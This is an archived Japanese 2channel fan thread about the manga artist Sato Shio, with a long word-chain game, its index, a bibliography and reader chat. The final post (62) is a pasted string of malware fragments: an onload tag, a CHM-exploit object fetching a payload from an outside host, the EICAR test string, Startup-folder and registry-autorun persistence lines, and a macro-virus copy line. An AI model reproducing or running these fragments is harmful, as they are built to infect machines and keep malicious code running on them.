5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

◇◆佐藤史生を語るスレ第3複合船◆◇

1 :花と名無しさん:2006/08/19(土) 00:32:42 ID:4OopKUzY0
寡作ですが、密度の高い良く練られた作品を発表し続けている
佐藤史生さんに 付いて語り合いませう♪
『夢みる惑星』『ワン・ゼロ』『天界の城』『この貧しき地上に』その他たくさん。
まだ読んだことのない人から全作品に目を通したツワモノまで歓迎します。

前スレ
【新作】佐藤史生を語るスレ第2複合船【切望】
http://comic6.2ch.net/test/read.cgi/gcomic/1055344092/
ド・サトこと佐藤史生を語るスレ
http://comic.2ch.net/test/read.cgi/gcomic/1003262828/




2 :花と名無しさん:2006/08/19(土) 00:34:13 ID:???0
*現在このスレでは<新作出るまで・佐藤史生しりとり>進行中。
(もちろん、それ以外の雑談も大歓迎です)
ガイシュツ語は次の通り。まとめ人さんに感謝!


佐藤史生 → オランティス → 小尾倭(おびやまと) → トキ(都祈雄の呼称) 
→ 金星樹 → 夢見る惑星 → イネス → 翠妖 → 雨衣子 → 金竜山脈
→ クシャナ → 七生子 → 金剛 → ウラニ・ボルフ(天界の城) → 風蓮花
→ 加賀見 木杉 彦 → この貧しき地上に → ニルヴァーナ → ナノセカンド
→ ド・サト → 透明くらぶ → ブラッディ・メリー → イスファ 
→ ファンタスティック・プラネット →時祈雄 → 鬼追うもの → のりっぺ(乃里子)
→ ペキン・ラブ・ダック → 九龍アパート → トール → 類 → イドリム
→ ムーン・チャイルド → ドクター・山田 → マユリ → リン・ミライ 
→ 一陽来復 → クララ → ライジア → アシュバ → バナナ・トリップに最良の日
→ ヒカル → ルバイ → 一角獣の森で → ディーバ → バビロンまで何マイル
→ ルシャナ → 夏彦 → 恋は味なもの?! → ノーマル型 → タウリシュ
→ 靱生(ゆきお) → オフィーリア探し → 死せる王女のための孔雀舞 → 沼田
→ 太王母  → ボウイ → いくは「的」 → 波童 → 雨衣子 → コンラッハ
→ ハヌマンを探して → テネシー → シュネ → ネペンティス → スターフラワー

3 :花と名無しさん:2006/08/19(土) 00:34:48 ID:???0
→ われはその名も知らざりき → 金目・銀目 → 馬鳴(めみょう)アキラ → ライコウ
→ ウル・ナム → 「無尽の力」 → ランキ・ゾシマ → マナ → ナイアル・ウダイ
→ イカくんはうまい → 一代雑種 → 夢喰い  →インドラ  → 羅城
→ 歌 → タキツス → 須藤 始 → 馬頭鬼 → キング・ネルヴァ → アスカ
→ カランダ → タジオンの馬鹿! → 隍(からぼり) → リリエンスール 
→ ルルス・ソーサラー → ラカン導師 → 宿脳人(しゅくのうびと) → トロ・ノイ
→ 銀耳(インアル) → ルワナ・エラス → ズオー(ス=ズ) → おん・まゆらきらていそわか
→ カンジャ芋 → モルカンド →(ド=ト)トライン蔦 →タオピ → ビローチャナ 
→ ナノ物質 → ツイン → イリス → スサ →砂糖・塩 → オリハン大公 
→ ウーリー・マカール → ルキソーヤ →ヤムラッハ → 早川書房 → 宇陀教授
→ YUGI → 奇想天外社 → ヤール → ルフ → フェーべ → ベンジュラム
→ 「無意識」 → 吉祥花人(本来「ラクシュミー」と読ませるが、「きっしょうかじん」と読んで)
→ ジーザス、クライスと、スーパースター → 打天楽 → 紅の影 → 月曜日のクリス
→ スーアン → 青い犬 → ムーナン(「ぬ」と「む」の取り違え?指摘が入らずそのまま続行)
→ ナタリア → アレフ → ファーン


4 :花と名無しさん:2006/08/19(土) 00:35:53 ID:???0
注)「ン」で終わる単語についてはツイン→「イ」でも「イン」でもどっちでもありで。
次の人が分かりやすいように前の人が指示してあげて下さい。


→ アンダー → ダーサ → 百日紅 → リル貸 → カラ → 羅陵王
→ 柔い機械(ウェットウェア)  → アスラン王 → ウー・スン博士 → セフィロート
→ 東盟大 → インドリヤ → やどり木 → キニ・オール種
→ 由良止 布瑠部 由良由良 布瑠部(正しくは止布瑠) → 反閇 → イスタンハル → ルシフェル → ルム → ムジナ → ナラゴニア(阿呆国) → アリアドネー
→ ネムラナイ ウオヲ ネムラセ ワレヲ メザメサセヨ → ヨッド → 土蝗 → 占い者
→ 安良 → 融市(ラーフ・シティ) → 今西冬衛 → エクルクルスス
→ スフィンクスより愛をこめて → 天の足音 → トゥネ → ねむり男ツェザーレとカリガリ博士
→ 青猿記 → 貴種 → 夢食い → イスファ → アスカンタ → 篁 → ラッカ牛のカツレツ
→ 土蜘蛛 → モルテス → 翠妖 → ウーリ・マカール →


5 :花と名無しさん:2006/08/19(土) 00:38:03 ID:???0
→ ルイ子ママ → まるたの女 → ナルド長老 → うしとら門
→ 門馬公春 → ルナポリス → スワジ → シレギア → アタラクシア
→ アリアドネ → ネアン殿 → 乃木周子 → 強力(ごうりき)→ 麒麟の恩返し
→ 初列風切羽 → ネネ → ネモ → モデスコ王 → 五台(ウータイ)の山の中
→ 加佐波矢 → 夜光貝殻船 → 瀬戸大橋 → シップチャンドラー(雑貨商)
→ ライバ → バランシン一座 → ザイホ(の郷) → 星の丘より → リーカ
→ カルガン渓谷 → クワン(鰥) → ワン・ゼロ → ローレシア → アッシェン
→ エミ → ミューズリ → 竜の夢その他の夢 → メディック → ク・タナ
→ ナーガ(族) → カーゴ・シップ → フス → スター・トーク → クジ神殿
→ テセウス → スター・ゲイト → トル・ソル・アザイ・ザイ




 → インドネシア → アスル海 → インベーダー(侵入者) → タイロー → ローリー
 → 竜穴 → 追儺(ついな) → 難民 → ミナエ → エメラルド・オレンジ
 → ジガ産の星石 → 銀のアルヘンティナ → 七万アゴン → 国際保安機構
 → 馬(ウマ) → 麻雀必勝のための方法序説 → 角鹿(つぬが)



6 :花と名無しさん:2006/08/19(土) 00:41:09 ID:???0
→ ガルーダ → ダグン → 黒塚 → カラクト
→ 飛んでる女性連盟シンパシティック・フェミニスト・クラブ
→ ブタ犬のヌイグルミ → ミスルト → 東京湾市《トーキョーベイシティ》
→ いい子になったら、花つんでおやり → 竜の谷
→ 人間は雨風をしのぐ家をたて子どもを育てるじゃないか
→ カズラギ → 銀海 → イルの花 → ナム → ムコ養子要員
→ インド → 刀美(とみ)→深生子(みおこ)→コンラッハ→ハイパーマン
→ 魔術師さがし→シルドゥーン→ウーマン・パワーKK→ゲゲゲの筆
→ デンマン→マントラ→ラーマーヤナ→苗→エンパイア・ミレニアム
→ ムッシュ・ステファン・デ・サント→ドルセラ→ラバン→春を夢見し
→ シルドラ姫→鳴弦師→ジョック→グレ→レンコ


7 :花と名無しさん:2006/08/19(土) 00:55:35 ID:???0
→ 小雪(「オフィーリア探し」クリスパラスのコンパニオンの名前)
→ キング・クラヴァート(「心臓のない巨人」)
→ トゥロウンズ・ジェット」(「魔術師さがし」)
→ 童門教授(「ワン・ゼロ」マニアックの産みの親)
→ 寿麻(じゅま)(「打天楽」)
→ マスター チャリス(「魔術師さがし」)
→ ストーム (「オフィーリア探し」の危機管理会社)
→ 虫の王国(「心臓のない巨人」複合船ホロシアムのプログラムの一つ)
→ クラヴァート(「心臓のない巨人」)
→ 毒キノコ酒(「ミッドナイトフィーバー」猫柳君が作ったお酒)
→ 朱夏(「心臓の無い巨人」)
→ 花炎石(「夢見る惑星」星船の動力源)
→ キム・ヒンクリー(「精霊王」富豪ヒンクリーの養子、国連工科大生)

しりとりここまでです。


*過去ログまとめ*
ド・サトこと佐藤史生を語るスレ
http://comic.2ch.net/test/read.cgi/gcomic/1003262828/
佐藤史生
http://salad.2ch.net/gcomic/kako/987/987902602.html
佐藤史生について
http://piza.2ch.net/gcomic/kako/969/969378151.html



8 :花と名無しさん:2006/08/19(土) 10:32:00 ID:???0
しりとり索引:語彙,レス番号(2,3は前々スレの貼り付け),出現した順番,説明の順です。
<<あ行>>
【あ】青い犬,38,128 アシュバ,2,40   アスカ,3,86    アスカンタ,219,171
アスラン王,129,140 アスル海,356,225  アタラクシア,270,186
アッシェン,316,210 アリアドネ,271,187 アリアドネー,176,154
アレフ,68,131    アンダー,110,133
【い】いい子になったら、花つんでおやり,458,249
イカくんはうまい,3,76 いくは「的」,2,58
イスタンハル,168,149 イスファ,2,23   イスファ,218,170,<二回目>
一代雑種,3,77    一陽来復,2,37   一角獣の森で,2,44 イドリム,2,32
イネス,2,7      今西冬衛,206,161 イリス,3,106    イルの花,470,254
銀耳(インアル),3,95 インド,493,257   インドネシア,355,224
インドラ,3,79    インドリヤ,149,144 インベーダー(侵入者),358,226
【う】雨衣子,2,9   雨衣子,2,60,<二回目> ウー・スン博士,141,141
五台(ウータイ)の山の中,293,196      ウーマン・パワーKK,551,264
ウーリー・マカール,3,110         ウーリ・マカール,246,177,<二回目>
柔い機械(ウェットウェア),125,139     艮門(うしとらもん),262,181
歌,3,81       宇陀教授,3,114   馬(ウマ),382,238
占い者,185,158    ウラニ・ボルフ(天界の城),2,14     ウル・ナム,3,71
【え】エクルクルスス,207,162       エミ,317,211
エメラルド・オレンジ,375,233       エンパイア・ミレニアム,563,270
【お】鬼追うもの,2,26 小尾倭(おびやまと),2,3        オフィーリア探し,2,53
オランティス,2,2   オリハン大公,3,109 おん・まゆらきらていそわか,3,98


9 :花と名無しさん:2006/08/19(土) 10:36:20 ID:???0
<<か行>>
【か】カーゴ・シップ,328,217       花炎石,720,291,「夢見る惑星」星船の動力源
加賀見彬彦,2,16   加佐波矢,294,197  カズラギ,465,252  カラ,122,137
カラクト,443,244   隍(からぼり),3,89 カランダ,3,87    カルガン渓谷,309,206
カンジャ芋,3,99   ガルーダ,404,241
【き】貴種,216,168  奇想天外社,3,116
吉祥花人,17,122,(本来「ラクシュミー」と読ませるが、「きっしょうかじん」と読んで)
キニ・オール種,160,146 キム・ヒンクリー,891,292,「精霊王」富豪ヒンクリーの養子、国連工科大生
麒麟の恩返し,285,191  キング・クラヴァート,666,281,「心臓のない巨人」
キング・ネルヴァ,3,85 金星樹,2,5    金目・銀目,3,68   銀海,466,253
銀のアルヘンティナ,377,235
【く】九龍アパート,2,29 クジ神殿,333,220 クシャナ,2,11   ク・タナ,324,215
クラヴァート,703,288,「心臓のない巨人」  クララ,2,38    紅の影,24,125
黒塚,442,243     クワン(鰥),310,207  グレ,574,278
【け】ゲゲゲの筆,554,265          月曜日のクリス,26,126
【こ】恋は味なもの?!,2,49        国際保安機構,380,237
この貧しき地上に,2,17 小雪,650,280,「オフィーリア探し」クリスパラスのコンパニオンの名前
金剛,2,13       コンラッハ,2,61   コンラッハ,546,260,<二回目>
金竜山脈,2,10     強力(ごうりき),284,190


10 :花と名無しさん:2006/08/19(土) 10:43:57 ID:???0
<<さ行>>
【さ】佐藤史生,2,1  砂糖・塩,3,108    百日紅,117,135  ザイホ(の郷),304,203
【し】死せる王女のための孔雀舞,2,54     シップチャンドラー(雑貨商),298,200
朱夏,714,290,「心臓の無い巨人」       宿脳人(しゅくのうびと),3,93
シュネ,3,64     初列風切羽,286,192   シルドゥーン,550,263
シルドラ姫,571,275  シレギア,269,185
ジーザス、クライスと、スーパースター,20,123,「と」はママ
ジガ産の星石,376,234 寿麻,688,284,じゅま  ジョック,573,277
【す】翠妖,2,8    翠妖,245,176,<二回目> スーアン,34,127 スサ,3,107
スター・ゲイト,335,222 スター・トーク,332,219 スターフラワー,3,66
須藤 始,3,83     ストーム,695,286,「オフィーリア探し」の危機管理会社
スフィンクスより愛をこめて,208,163      スワジ,266,184
ズオー(ス=ズ),3,97
【せ】青猿記,215,167  瀬戸大橋,297,199   セフィロート,144,142
<<た行>>
【た】太王母,2,56   タイロー,359,227   タウリシュ,2,51 タオピ,3,102
篁,223,172      タキツス,3,82     タジオンの馬鹿!,3,88
ダーサ,112,134    ダグン,431,242     打天楽,22,124
【つ】追儺(ついな),365,230          ツイン,3,105  土蜘蛛,243,174
角鹿(つぬが),392,240
【て】テセウス,334,221 テネシー,3,63    天の足音,209,164
ディーバ,2,45     デンマン,555,266
【と】トゥネ,211,165  透明くらぶ,2,21   東盟大,148,143
トゥロウンズ・ジェット」,670,282,「魔術師さがし」
東京湾市《トーキョーベイシティ》,456,248   トール,2,30
トキ(都祈雄の呼称),2,4 時祈雄,2,25     刀美,544,258   (ド=ト)トライン蔦,3,101
トル・ソル・アザイ・ザイ,336,223      トロ・ノイ,3,94
飛んでる女性連盟シンパシティック・フェミニスト・クラブ,445,245
童門教授,671,283,「ワン・ゼロ」マニアックの産みの親
毒キノコ酒,712,289,「ミッドナイトフィーバー」猫柳君が作ったお酒
ドクター・山田,2,34   土蝗,179,157    ド・サト,2,20   ドルセラ,566,272


11 :花と名無しさん:2006/08/19(土) 10:49:07 ID:???0
<<な行>>
【な】ナーガ(族),326,216 ナイアル・ウダイ,3,75 苗,561,269  七生子,2,12
ナタリア,67,130     夏彦,2,48       七万アゴン,379,236
ナノセカンド,2,19    ナノ物質,3,104     ナム,477,255 ナラゴニア(阿呆国),175,153
ナルド長老,256,180   難民,368,231
【に】ニルヴァーナ,2,18 人間は雨風をしのぐ家をたて子どもを育てるじゃないか,463,251
【ぬ】沼田,2,55
【ね】ネアン殿,272,188 ネネ,287,193      ネペンティス,3,65
ネムラナイ ウオヲ ネムラセ ワレヲ メザメサセヨ,177,155
ねむり男ツェザーレとカリガリ博士,212,166    ネモ,288,194
【の】ノーマル型,2,50  乃木周子,274,189    のりっぺ(乃里子),2,27
<<は行>>
【は】ハイパーマン,547,261 波童,2,59      ハヌマンを探して,2,62
早川書房,3,113       春を夢見し,570,274  バナナ・トリップに最良の日,2,41
バビロンまで何マイル,2,46 バランシン一座,300,202
【ひ】ヒカル,2,42     ビローチャナ,3,103
【ふ】ファーン,97,132   風蓮花,2,15      フェーべ,12,119
フス,329,218        ブタ犬のヌイグルミ,453,246
ブラッディ・メリー,2,22   ファンタスティック・プラネット,2,24
【へ】反閇,166,148     ベンジュラム,13,120  ペキン・ラブ・ダック,2,28
【ほ】星の丘より,307,204  ボウイ,2,57


12 :花と名無しさん:2006/08/19(土) 10:57:13 ID:???0
<<マ行>>
【ま】麻雀必勝のための方法序説,386,239      魔術師さがし,549,262
マスターチャリス,692,285,「魔術師さがし」    マナ,3,74
マユリ,2,35        まるたの女,252,179  マントラ,556,267
【み】深生子,545,259   ミスルト,454,247   ミナエ,370,232 ミューズリ,318,212
【む】無意識,16,121
ムーナン,64,129,(「ぬ」と「む」の取り違え?指摘が入らずそのまま続行)
ムーン・チャイルド,2,33  ムコ養子要員,483,256 ムジナ,174,152
虫の王国,700,287,「心臓のない巨人」複合船ホロシアムのプログラムの一つ
無尽の力,3,72       ムッシュ・ステファン・デ・サント,564,271
【め】鳴弦師,572,276   馬頭鬼,3,84     メディック,323,214 馬鳴(めみょう)アキラ,3,69
【も】モデスコ王,289,195 モルカンド,3,100   モルテス,244,175  門馬公春,263,182
<<や行>>
【や】ヤール,6,117    夜光貝殻船,295,198  安良,201,159
やどり木,158,145     ヤムラッハ,3,112
【ゆ】YUGI,3,115   靱生(ゆきお),2,52  夢喰い,3,78    夢食い,217,169,<二回目>
夢見る惑星,2,6      由良止 布瑠部 由良由良 布瑠部(正しくは止布瑠),164,147
【よ】ヨッド,178,156


13 :花と名無しさん:2006/08/19(土) 10:57:37 ID:???0
<<ら行>>
【ら】融市(ラーフ・シティ),203,160       ラーマーヤナ,557,268
ライコウ,3,70      ライジア,2,39     ライバ,299,201  ラカン導師,3,92
羅城,3,80        ラッカ牛のカツレツ,242,173
ラバン,569,273      羅陵王,123,138    ランキ・ゾシマ,3,73
【り】リーカ,308,205   竜穴,361,229     竜の谷,460,250  竜の夢その他の夢,320,213
リリエンスール,3,90   リル貨,121,136     リン・ミライ,2,36
【る】類,2,31      ルイ子ママ,251,178   ルキソーヤ,3,111
ルシフェル,169,150    ルシャナ,2,47     ルナポリス,265,183
ルバイ,2,43       ルフ,8,118       ルム,170,151
ルルス・ソーサラー,3,91 ルワナ・エラス,3,96
【れ】レンコ,575,279
【ろ】ローリー,360,228  ローレシア,315,209
<<わ行>>
【わ】われはその名も知らざりき,3,67       ワン・ゼロ,313,208


14 :花と名無しさん:2006/08/19(土) 11:01:45 ID:???0
しりとり索引の索引
>>8 あ行
>>9 か行
>>10 さ行・た行
>>11 な行・は行
>>12 ま行・や行
>>13 ら行・わ行

15 :花と名無しさん:2006/08/19(土) 12:36:20 ID:???0
■コミックス
「金星樹」 奇想天外社
「春を夢見し」 新書館
「死せる王女のための孔雀舞」 新書館
「阿呆船」 新書館
「夢みる惑星」全4巻 小学館
「この貧しき地上に」 新書館
「ワン・ゼロ」全4巻 小学館
「打天楽」 小学館
「羅陵王」 白泉社
「やどり木」 新書館
「チェンジリング」 小学館
「精霊王」 小学館
「金星樹」 新潮社
「鬼追うもの」 小学館
「心臓のない巨人」 小学館
「魔術師さがし」 小学館

■画集
「竜の夢その他の夢 夢みる惑星ノート」 新書館

16 :花と名無しさん:2006/08/19(土) 12:37:01 ID:???0
■文庫
「夢みる惑星」全3巻 小学館
「ワン・ゼロ」全3巻 小学館
「天界の城」 早川書房
  (阿呆船/馬祠祭/天界の城/羅陵王/やどり木)
「打天楽 ワン・ゼロ番外編」 小学館
  (打天楽/夢喰い/ムーンチャイルド/楕円軌道ラプソディ/チェンジリング/ネペンティス)
「精霊王 徳永メイ原案作品集」 小学館
  (精霊王/アシラム/オフィーリア探し/アレフ/タオピ)

■アンソロジー
「ニュー・ファンタジー・コミックの世界」 サンリオ (夢喰い)
「吉祥花人(ラクシュミ−)」 白泉社 (緑柱庭園)
「アリス・ブックT」 新潮社 (竜の姫君)
「アリス・ブックU」 新潮社 (雨の竜)
「時空の旅」 ポプラ社 (金星樹)
「星のファンタジー1」 幻冬舎 (花咲く星々のむれ)
「星のファンタジー2」 幻冬舎 (一角獣の森で)
「星のファンタジー3」 幻冬舎 (レギオン)
「花のミステリー」 あおば出版 (春を夢見し)
「星のミステリー」 あおば出版 (阿呆船)

17 :花と名無しさん:2006/08/19(土) 12:38:02 ID:???0
*夢みる惑星関連作品
星の丘より…「金星樹」「竜の夢その他の夢」に収録
雨の竜…「竜の夢その他の夢」「アリス・ブックU」に収録
竜の姫君…「アリス・ブックT」に収録

関連リンク
flowersインタビュー
ttp://flowers.shogakukan.co.jp/interviwe/interviwe_05.html
佐藤史生 復刊特集ページ
ttp://www.fukkan.com/group/index.php3?no=12

18 :花と名無しさん:2006/08/19(土) 17:56:33 ID:???O
す、すごい…
こんな丁寧なテンプレ初めてみた
>>1乙です。感動した!

19 :花と名無しさん:2006/08/19(土) 18:54:08 ID:???0
いやはや、しりとりのまとめに於いては言葉もない

おーーーーーーーーーーーーーーーーーーーーーつ

20 :花と名無しさん:2006/08/19(土) 20:20:47 ID:???0
凄い・・・乙乙乙!!!

21 :花と名無しさん:2006/08/19(土) 22:05:01 ID:???0
 !!!!!
私、前スレでスレ立てお願いした無能な人です
1さん、ありがとうございます
きっと有能で感じの良い人なんですね
多謝!

ついでに登場人物のAAなどがあると
嬉しいのですがどなたかご存知ないですか
…贅沢な注文ですね

22 :花と名無しさん:2006/08/19(土) 22:40:14 ID:???0
作品集の前にしりとり置いてどうすんだよ。アホか。

23 :花と名無しさん:2006/08/19(土) 22:47:43 ID:???0
まあまあ。

24 :花と名無しさん:2006/08/19(土) 22:58:38 ID:???0
新作出ないのは
原因としてどっちだと思いますか?
@オファーが無い
Aその気が無い

@なら本気で各社に希望アンケートなど出しますが
Aなら対策が〜

25 :花と名無しさん:2006/08/19(土) 23:10:37 ID:???0
「その気がない」に一票・・・

26 :花と名無しさん:2006/08/19(土) 23:43:53 ID:???0
すみません、しりとり先においちゃったのは1です。
それで8以降の語彙まとめと、
関連書籍を貼ってくださったのは別のかたです。
たしかに書籍を先に貼るべきでした。ごめんなさい〜

27 :花と名無しさん:2006/08/20(日) 01:27:20 ID:???O
載る雑誌がないんじゃないかな
どうも最近の少女漫画界は、古い力のある作家さんが一気にあぶれ出してる傾向があるので。
過去にヒット作を生み出した作家の島流れも全く珍しくないし。

最後に雑誌に載ったのは、魔術師探しだっけ?
その雑誌も廃刊になってるよね

28 :花と名無しさん:2006/08/20(日) 02:41:07 ID:???0
廃刊というか統合では?

29 :花と名無しさん:2006/08/20(日) 11:38:49 ID:???0
これから書くまんが家さんは、みんなわたしが大好きなまんが家さんのことなので、荒れないでね。

今、載るとしたら、FLOWERSぐらいかな、と思うんです。佐藤先生のまんが。萩尾望都・吉田秋生両先生が
載るくらいだし。で、そのマーケットはいくばくのものか、と。

小学館のFLOWERSにあたるのは、集英社では、講談社では、と考えると、暗澹たる気持になります。大ヒット
しているハチクロですら掲載誌2度目の変更(だよね)。清原なつの先生が載る雑誌がない。で、FLOWERSに来る。
長谷川潤さんの路線変更、谷川史子さんの掲載誌の変更、そのあたりが、元々清原先生が載ってたあたりの雑誌に載る。

で、その次の世代の、そのまた次の次くらいの世代の絵柄が、今のりぼんやなかよしに載ってるんだから、
地獄少女の永遠幸先生の絵柄で驚いてはいけないんだって思った。

たぶん5年単位で読者の嗜好って変わっていってるんじゃないかなと思う。大泉サロンの頃から数えれば、すでに、
漫画読者は、8世代目くらいに変わってきてしまっている。そこで、誰がコミック雑誌をお金を出して買っているか、
っていうと…わたしは、清原先生の世代だけど、同年代でまんがの雑誌買ってる人、いない。
同じ作品について話すには2ちゃんに来ないと相手がいない。

 と、なると、BIRZやWebコミックにしか、佐藤先生が載る媒体が無いように思う。
アンダロのように。(あれ、いいまんがだと思うけど、紙の雑誌に載らないんだよね。)


30 :花と名無しさん:2006/08/20(日) 19:18:01 ID:???0
>>15-17

31 :花と名無しさん:2006/08/21(月) 09:23:34 ID:???0
前スレ埋めで盛り上がっているね。

32 :953:2006/08/21(月) 14:19:23 ID:???0
>24
今そんなに創作意欲がわかないんじゃないかなー、と想像
描きたいことはだいたい描いちゃったとゆーか
あるいは
家庭の事情で創作の時間がとれない、とかもあるかもしれん
(女性の場合、男性よりそーゆー負担が大きいし)



33 :花と名無しさん:2006/08/22(火) 06:56:27 ID:???0
>32
 かなしひ。


34 :花と名無しさん:2006/08/22(火) 14:27:05 ID:???0
SF少女漫画について語るスレ
http://comic6.2ch.net/test/read.cgi/gcomic/1144803511/l50

作家別一覧ができて、面白いことになってる。

35 :花と名無しさん:2006/08/22(火) 20:23:43 ID:???O
>>29

>大泉サロンの頃から数えれば、すでに、漫画読者は、8世代目くらいに変わってきてしまっている。

そう考えるとすごいですね。少女マンガは特に新陳代謝が激しいらしいですが。

>と、なると、BIRZやWebコミックにしか、佐藤先生が載る媒体が無いように思う。

ウェブコミックは個人的には勘弁して欲しいですね。もう年だから目が痛くなるし…。
私の場合、文庫のコミックスだって後何年読めるか不安なので、老後に備えて、なるだけ大判のサイズを買う様にしてます。チラ裏スマソ。

36 :花と名無しさん:2006/08/23(水) 22:24:30 ID:???0
新作を描いてくれるなら、ウエッブコミックでも大歓迎!
そりゃ、
もちろん紙媒体のほうがいいけどね。

37 :花と名無しさん:2006/08/26(土) 04:14:55 ID:???O
『夢みる惑星』の後日談みたいなのあったでしょ?
載ってるコミックスなくしちゃった。
あとグレープフルーツに載ってたのはみんな面白かったね。

38 :花と名無しさん:2006/08/28(月) 01:18:07 ID:???0
「夢みる惑星」の後日談、読めてないや。
新作じゃなくても、絶版本の再販でも嬉しいのだけど。

コミックスを読み返していると、相関図や設定資料とかを無性に見てみたくなる。
特に複合船シリーズ。何処まで話が繋がっているんだろう。

39 :sage:2006/08/29(火) 14:20:25 ID:7/vX9LXJ0
>>38
アマゾンのマケプレにアリスブックTU時々出てますよ。
プレミアついてないことが多いです。
私は一度ブクオフに売ったのにまた読みたくなってマケプレで買いました。
馬鹿みたいなので二度と売りません。

40 :花と名無しさん:2006/09/02(土) 20:10:40 ID:???0
せっかくの新スレなのに早くも過疎ってますねw

まあネタが全然無いにしちゃしぶといとも言えるか

41 :花と名無しさん:2006/09/02(土) 23:01:40 ID:???0
いいんだよー落ちさえしなければ。
ひまなときはシリトリですね。

>>7
キムヒンクリーのつづきで、 陵王(りょうおう) 

「翠妖」のモデル、「『陵王』あるいは『羅陵王』とよばれるもの」(『羅陵王』)

次はウで。

42 :花と名無しさん:2006/09/05(火) 12:39:52 ID:???O
なくしちゃった「鬼追うもの」、だらけで買いなおしました。なんか悔しい…なんでなくしちゃったんだ、自分のバカ。

43 :花と名無しさん:2006/09/11(月) 23:27:23 ID:???0
どーもしり取りも続きそうも無いね

ネタも無いし、ありきたりだけど他にどんなスレや板に行ってるか
書いてみる

えーと漫画スレでは、これまたありきたりだけど星野や諸星スレ
あとは主にアフタヌーンを読んでるんでそれ関係
それから音楽は洋邦問わずあちらこちらに
あと自転車板もちょこっと

で、一番通うのはバイク板
興味ない人には訳ワカランだろうけど他の板にくらべると
比較的平和(らしい)んでヒマだったら覗いてみてください

私自身はあんまり書き込みませんけどw
スレ汚しスマソ

44 :花と名無しさん:2006/09/12(火) 17:04:56 ID:???0
わたしは軍事板

45 :花と名無しさん:2006/09/12(火) 18:17:59 ID:???0
軍事ナカーマw

全部書いたらきりがないけど考古学、民俗・神話学とか

46 :花と名無しさん:2006/09/12(火) 20:04:43 ID:???0
最近はSF少女漫画について語るスレを興味深く覗いている。

47 :花と名無しさん:2006/09/12(火) 23:00:13 ID:???0
>46
同じだ!

48 :47:2006/09/12(火) 23:05:34 ID:???0
>43
しりとり続けたいんだけど、今じっくりしっかり探す時間無くて。
こことあと数スレ覗いて47のような短文書くくらいしか参加できん。
暇できたらしりとり絶対やるから。

49 :花と名無しさん:2006/09/12(火) 23:12:07 ID:???0
俺はSF少女漫画スレで知った作品をすでにいくつか読んでたりする

50 :花と名無しさん:2006/09/13(水) 00:37:15 ID:???0
>49
同志w

あと、少女漫画図書館と少女漫画ベストの過去スレとか。
読書傾向が似ている人のレスは興味深い。

51 :花と名無しさん:2006/09/13(水) 19:05:46 ID:???0
砂糖塩のスレに軍オタが二人もいるとはちょっと意外だ

俺は少女漫画のSFってイマイチ苦手だな
佐藤や萩尾くらいどっか突き抜けてればいいんだけど
でも所詮漫画好きだから機会があれば楽しく読みますけどねw

52 :花と名無しさん:2006/09/14(木) 10:47:41 ID:???0
少女漫画のSF(とか少年漫画のSF)って区分けすると何だかなぁw

よく通うのは生き物系のスレ(板はいろいろ)だな

53 :花と名無しさん:2006/09/15(金) 01:59:26 ID:???0
オカルト板、占い理論実践板、ゲーハー板、
週間少年漫画板、あたりに常駐。

佐藤史生はじめ、グレープフルーツ世代の少女漫画家は、
マンガのSF、とか、少女漫画のSF、
とかいうくくりを外して、すごく面白いSFだと思うよ。

好きな作家は、24年組(萩尾、大島)と、
佐藤史生と同時期に活躍していた森脇真末味、明智抄。
ただ、森脇、明智は、佐藤史生と同じく、
最近断筆中でさみしい……

54 :花と名無しさん:2006/09/15(金) 03:34:01 ID:???0
森脇は自分も好きだ〜。「アンダー」は面白かった
鳥図明児は断筆の上絶版で寂しい・・

55 :花と名無しさん:2006/09/15(金) 06:50:43 ID:???0
鳥図アケル懐かしい。「虹神殿」ね。
他に人類退化実験(?)後の世界を描いた短編も記憶に残っている。

「日処天」「夢見る惑星」「虹神殿」はほぼ同時期に連載されてて
どれも読んでたな。「吉祥天女」も読んでた。

出生に問題があり、権謀術数に長け、超能力を持った主人公が暗躍
ってパターンが好きだったのかも
(おかげでアルド・ナリスまで好きになりそうになったけど、そっちは挫折した)。

4人とも単なる超能力美形キャラではなく、
屈折しているというより単に邪悪だったり(皇子、天女)、
逆に飄々としていたり(イリスと虹神殿の主人公)するところが気に入っていた。

オヤジキャラが上手く描けているのも共通点だったように思う。

自分語りでごめんなさい。

56 :花と名無しさん:2006/09/15(金) 08:01:21 ID:M1jvyCh/0
お〜 佐藤史生好きは森脇、明智、鳥図好きか〜
同じだ! 
今の良質漫画でお薦めあったら教えて下さい

57 :花と名無しさん:2006/09/15(金) 10:02:29 ID:???O
>>55

> 他に人類退化実験(?)後の世界を描いた短編も記憶に残っている。

なんて作品ですか?よかったら教えてください。
しかし、このスレでアルド・ナリスの名前を見るとはWWWWW.はまらなくてよかっ(ry

58 :花と名無しさん:2006/09/15(金) 20:29:15 ID:???0
54だがはまってると言えるか分からんけどまだ読んでるよ>グイン
ここまで来てやめるわけにもいかないし ('A`)

ナリスと言えばオーガス・カーターとサキ・ヴァシュタールを思い浮かべて
果てしなく脱線して行く・・ごめん

59 :花と名無しさん:2006/09/15(金) 20:54:04 ID:AmGsskbS0
>58
え? サキ・ヴァシュールって「エリア88」の?
で、オーガス・カーターって「パーム」の?

60 :花と名無しさん:2006/09/15(金) 21:29:07 ID:???0
そう。
グイン作者がエリア88を読んでるらしくてサキについて何か
書いてたと思う。それもあって連想しました。
パームは新書館だからというわけじゃないけどやっぱりまだ読んでる。

61 :花と名無しさん:2006/09/15(金) 23:44:15 ID:???O
「パーム」、ナツカシ。伸たまき名義の頃、好きでした。
んで、ちょっと聞いて下さい!「2821コカ・コーラ」ってあったでしょ?私の家の電話番号の下4ケタ、2821なんですよ。更に、ジェームスの命日が10月18日なんだけど、私の誕生日なんです。これがウワサのシンクロニシティ!?
激しくスレチでゴメン。

62 :<body onload=window()>:2006/09/16(土) 02:00:42 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
